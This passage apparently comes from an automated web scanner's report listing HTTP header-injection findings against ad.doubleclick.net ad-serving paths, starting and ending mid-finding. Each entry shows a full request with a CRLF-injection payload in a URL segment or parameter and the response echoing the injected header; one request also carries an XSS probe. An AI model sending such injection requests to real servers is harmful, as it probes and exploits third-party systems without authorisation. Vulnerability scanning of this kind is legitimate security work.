0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D2162042623%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,4f2d7436-7bdf-11e0-be3c-0beb28e1956e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/24767
0e872898a45
/N5687.135388.BIZO/B5483330;sz=300x250;click=http://ad.doubleclick.net/click;h=v8/3b04/f/275/*/c;240571887;0-0;0;63465864;4307-300/250;41950541/41968328/1;u=,bzo-19844286_1305125992,11f8f328940989e,Miscellaneous,bzo.slqz-bzo.e6d-bzo.T8P-bzo.h3i-bzo.d8n-bzo.c9q-dx.16-dx.23-dx.17-cm
Date: Wed, 11 May 2011 15:33:57 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.21. http://ad.doubleclick.net/adj/bnet.C0609/P0249 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/bnet.C0609/P0249

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 67291%0d%0ab7948c8fc55 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /67291%0d%0ab7948c8fc55/bnet.C0609/P0249;ab=nil;gb=nil;hb=nil;gc=US;gs=nil;gd=nil;tods=nil;tode=nil;tf=6;tp=10;dow=nil;atf=nil;cg=30;at=10;rt=nil;af=10;il=5942;sz=300x250;tile=2;u=il-5942_ID-08131AB5FC261880B2CF7A.37395FF;ae=10;bkv30=0;grid=-1;olid=-1;ord=3624325946439057? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/67291
b7948c8fc55
/bnet.C0609/P0249;ab=nil;gb=nil;hb=nil;gc=US;gs=nil;gd=nil;tods=nil;tode=nil;tf=6;tp=10;dow=nil;atf=nil;cg=30;at=10;rt=nil;af=10;il=5942;sz=300x250;tile=2;u=il-5942_ID-08131AB5FC261880B2CF7A.37395FF;ae=10;bkv30=0;grid=-1;olid=-1;ord=3624325946439057:
Date: Wed, 11 May 2011 15:47:31 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.22. http://ad.doubleclick.net/adj/cm.starpulse/srb_jbl_042911 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.starpulse/srb_jbl_042911

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2bea3%0d%0aeb35bac342c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2bea3%0d%0aeb35bac342c/cm.starpulse/srb_jbl_042911;net=cm;u=,cm-88859680_1305125771,11f8f328940989e,ent,ax.340-am.h-am.b-cm.ent_h-cm.music_m-cm.weath_h-cm.sportsfan-cm.sportsreg-cm.sports_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-mm.ag1-mm.ak1-mm.am1-mm.aq1-idgt.careers_l-idgt.gadgets_h;;srb=srb_jbl_news;cmw=owl;sz=728x90;net=cm;ord1=182235;contx=ent;an=340;dc=w;btg=am.h;btg=am.b;btg=cm.ent_h;btg=cm.music_m;btg=cm.weath_h;btg=cm.sportsfan;btg=cm.sportsreg;btg=cm.sports_h;btg=ti.aal;btg=bz.25;btg=dx.16;btg=dx.23;btg=dx.17;btg=rt.truecredit2;btg=qc.ae;btg=qc.ac;btg=mm.ag1;btg=mm.ak1;btg=mm.am1;btg=mm.aq1;btg=idgt.careers_l;btg=idgt.gadgets_h;ord=681443252? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2bea3
eb35bac342c
/cm.starpulse/srb_jbl_042911;net=cm;u=,cm-88859680_1305125771,11f8f328940989e,ent,ax.340-am.h-am.b-cm.ent_h-cm.music_m-cm.weath_h-cm.sportsfan-cm.sportsreg-cm.sports_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-mm.ag1-mm.ak1-mm.am1-mm.aq1-idgt.careers_l-idgt.gadgets:
Date: Wed, 11 May 2011 15:00:12 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.23. http://ad.doubleclick.net/adj/edh.mayoclinic/eyevision/general [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/edh.mayoclinic/eyevision/general

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 24848%0d%0acac0b5346fb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /24848%0d%0acac0b5346fb/edh.mayoclinic/eyevision/general;net=wfm;u=,wfm-6695279_1305125996,11f8f328940989e,eye,dx.16-dx.23-dx.17-cm.ent_h-cm.weath_h-cm.sports_h-mm.aa1-mm.ah1-mm.aj1-mm.ak1-mm.ar1-mm.as1-mm.da1;;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;net=wfm;ord1=331865;contx=eye;dc=w;btg=dx.16;btg=dx.23;btg=dx.17;btg=cm.ent_h;btg=cm.weath_h;btg=cm.sports_h;btg=mm.aa1;btg=mm.ah1;btg=mm.aj1;btg=mm.ak1;btg=mm.ar1;btg=mm.as1;btg=mm.da1;ord=935450012? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.mayoclinic.com/health/pink-eye/DS00258
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/24848
cac0b5346fb
/edh.mayoclinic/eyevision/general;net=wfm;u=,wfm-6695279_1305125996,11f8f328940989e,eye,dx.16-dx.23-dx.17-cm.ent_h-cm.weath_h-cm.sports_h-mm.aa1-mm.ah1-mm.aj1-mm.ak1-mm.ar1-mm.as1-mm.da1;;pos=top;ugc=0;!c=mayo;tile=1;sz=300x250;net=wfm;ord1=331865;contx=eye;dc=w;btg=dx.16;btg=dx.2:
Date: Wed, 11 May 2011 15:36:05 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.24. http://ad.doubleclick.net/adj/sugar.tres/gallery [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/sugar.tres/gallery

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9bbf0%0d%0af47a72dcdb5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9bbf0%0d%0af47a72dcdb5/sugar.tres/gallery;nid=16415520;sz=970x66,970x418;gid=3019466;pos=above;tile=2;ord=49966 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.tressugar.com/Cannes-Film-Festival-History-16415520
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9bbf0
f47a72dcdb5
/sugar.tres/gallery;nid=16415520;sz=970x66,970x418;gid=3019466;pos=above;tile=2;ord=49966:
Date: Wed, 11 May 2011 14:58:29 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.25. http://ad.doubleclick.net/adj/sugar.tres/ros [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/sugar.tres/ros

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 723a8%0d%0a942d40e3e30 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /723a8%0d%0a942d40e3e30/sugar.tres/ros;sz=728x90;gid=3019466;pos=above;dcopt=ist;tile=1;ord=58645 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tressugar.com/Cannes-Film-Festival-History-16415520c7b9a%22-alert(1)-%226d84b52305d
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/723a8
942d40e3e30
/sugar.tres/ros;sz=728x90;gid=3019466;pos=above;dcopt=ist;tile=1;ord=58645:
Date: Wed, 11 May 2011 16:00:36 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.26. http://ad.doubleclick.net/adj/trb.zap2it/ntl/community [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/trb.zap2it/ntl/community

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 13b9b%0d%0aa33dd0e08de was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /13b9b%0d%0aa33dd0e08de/trb.zap2it/ntl/community;rs=10011;rs=10030;rs=10070;rs=D08734_70008;rs=D08734_72078;;ptype=sf;rg=ur;pos=t;dcopt=ist;sz=1x1;tile=1;u=http://www.zap2it.com/pop2it/video/;ord=7762411? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zap2it.com/pop2it/video/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/13b9b
a33dd0e08de
/trb.zap2it/ntl/community;rs=10011;rs=10030;rs=10070;rs=D08734_70008;rs=D08734_72078;;ptype=sf;rg=ur;pos=t;dcopt=ist;sz=1x1;tile=1;u=http://www.zap2it.com/pop2it/video/;ord=7762411
Date: Wed, 11 May 2011 15:53:57 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.27. http://ad.doubleclick.net/adj/trb.zap2it/ntl/hp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/trb.zap2it/ntl/hp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 53a1c%0d%0a31193cee46a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /53a1c%0d%0a31193cee46a/trb.zap2it/ntl/hp;;ptype=sf;slug=zap-2010homelayout;rg=ur;pos=t;dcopt=ist;sz=1x1;tile=1;u=http://www.zap2it.com/;ord=85014959? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zap2it.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/53a1c
31193cee46a
/trb.zap2it/ntl/hp;;ptype=sf;slug=zap-2010homelayout;rg=ur;pos=t;dcopt=ist;sz=1x1;tile=1;u=http://www.zap2it.com/;ord=85014959
Date: Wed, 11 May 2011 15:52:14 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.28. http://ad.doubleclick.net/adj/trb.zap2it/ntl/video [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/trb.zap2it/ntl/video

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 81f29%0d%0a5d57bed2220 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /81f29%0d%0a5d57bed2220/trb.zap2it/ntl/video;rs=10011;rs=10030;rs=10070;rs=D08734_70008;rs=D08734_70010;rs=D08734_70118;rs=D08734_70613;rs=D08734_72078;;ptype=sf;rg=ur;ref=zap2itcom;pos=t;dcopt=ist;sz=1x1;tile=1;u=http://www.zap2it.com/videobeta/watch/;ord=35233493? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zap2it.com/videobeta/watch/?watch=46b4b96c-d010-456a-8c9a-8848a32e31e3&cat=a2b03c2b-b892-4e41-8a2b-c09f9d4d5ff5&src=front
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/81f29
5d57bed2220
/trb.zap2it/ntl/video;rs=10011;rs=10030;rs=10070;rs=D08734_70008;rs=D08734_70010;rs=D08734_70118;rs=D08734_70613;rs=D08734_72078;;ptype=sf;rg=ur;ref=zap2itcom;pos=t;dcopt=ist;sz=1x1;tile=1;u=http://www.zap2it.com/videobeta/watch/;ord=35233493
Date: Wed, 11 May 2011 15:58:16 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.29. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 271d4%0d%0a9b831f6d759 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gif271d4%0d%0a9b831f6d759?5066642 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=zap2it
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gif271d4
9b831f6d759
:
Date: Wed, 11 May 2011 14:58:08 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.30. http://ad.doubleclick.net/pfadx/starpulse_cim/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/starpulse_cim/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload 48478%0d%0a450fe44fd28 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/starpulse_cim/;secure=false;position=2;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;pc2=1;ic2=1;AA=1;AH=1;AJ=1;AR=1;AS=1;ic24=1;ic10=1;ic6=1;sz=24x24;dcmt=text/html;ord=1305125776728?&48478%0d%0a450fe44fd28=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_9_1&protocol=http%3A&network=starpulse
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
DCLK_imp: v7;x;239954491;0-0;0;36764365;24/24;41800565/41818352/1;;~aopt=3/1/22/0;~okv=;secure=false;position=2;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;pc2=1;ic2=1;AA=1;AH=1;AJ=1;AR=1;AS=1;ic24=1;ic10=1;ic6=1;sz=24x24;dcmt=text/html;;48478
450fe44fd28
=1;~cs=t:
Date: Wed, 11 May 2011 15:00:25 GMT
Content-Length: 1361

DoubleClick.onAdLoaded('MediaAlert', {"impression": "http://ad.doubleclick.net/imp;v7;x;239954491;0-0;0;36764365;24/24;41800565/41818352/1;;~aopt=3/1/22/0;~okv=;secure=false;position=2;ic22=1;ic19=1;i
...[SNIP]...

4.31. http://ad.doubleclick.net/pfadx/starpulse_cim/ [secure parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/starpulse_cim/

Issue detail

The value of the secure request parameter is copied into the DCLK_imp response header. The payload 89df4%0d%0abe56f2dec30 was submitted in the secure parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/starpulse_cim/;secure=89df4%0d%0abe56f2dec30 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_9_1&protocol=http%3A&network=starpulse
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 237
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 14:59:23 GMT
Expires: Wed, 11 May 2011 14:59:23 GMT
DCLK_imp: v7;x;44306;0-0;0;36764365;0/0;0/0/0;;~aopt=2/1/22/0;~okv=;secure=89df4
be56f2dec30
;~cs=w:

<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b04/0/0/%2a/v;44306;0-0;0;36764365;783-50/50;0/0/0;;~aopt=2/1/22/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 al
...[SNIP]...

4.32. http://ad.doubleclick.net/pfadx/zap2it_cim/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/zap2it_cim/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload 7e5c5%0d%0ad9210606fd2 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/zap2it_cim/;secure=false;position=1;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;pc2=1;ic2=1;AA=1;AH=1;AJ=1;AR=1;AS=1;ic24=1;ic10=1;ic6=1;sz=24x24;dcmt=text/html;ord=1305125749062?&7e5c5%0d%0ad9210606fd2=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=zap2it
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
DCLK_imp: v7;x;239472171;0-0;14;57450681;24/24;42101881/42119668/1;;~aopt=3/1/22/0;~okv=;secure=false;position=1;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;pc2=1;ic2=1;AA=1;AH=1;AJ=1;AR=1;AS=1;ic24=1;ic10=1;ic6=1;sz=24x24;dcmt=text/html;;7e5c5
d9210606fd2
=1;~cs=d:
Date: Wed, 11 May 2011 14:57:17 GMT
Content-Length: 1153

DoubleClick.onAdLoaded('MediaAlert',{"impression":"http://ad.doubleclick.net/imp;v7;x;239472171;0-0;14;57450681;24/24;42101881/42119668/1;;~aopt=3/1/22/0;~okv=;secure=false;position=1;ic22=1;ic19=1;ic
...[SNIP]...

4.33. http://ad.doubleclick.net/pfadx/zap2it_cim/ [secure parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/zap2it_cim/

Issue detail

The value of the secure request parameter is copied into the DCLK_imp response header. The payload 16dd0%0d%0a6df1ea6af7c was submitted in the secure parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/zap2it_cim/;secure=16dd0%0d%0a6df1ea6af7c HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=zap2it
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
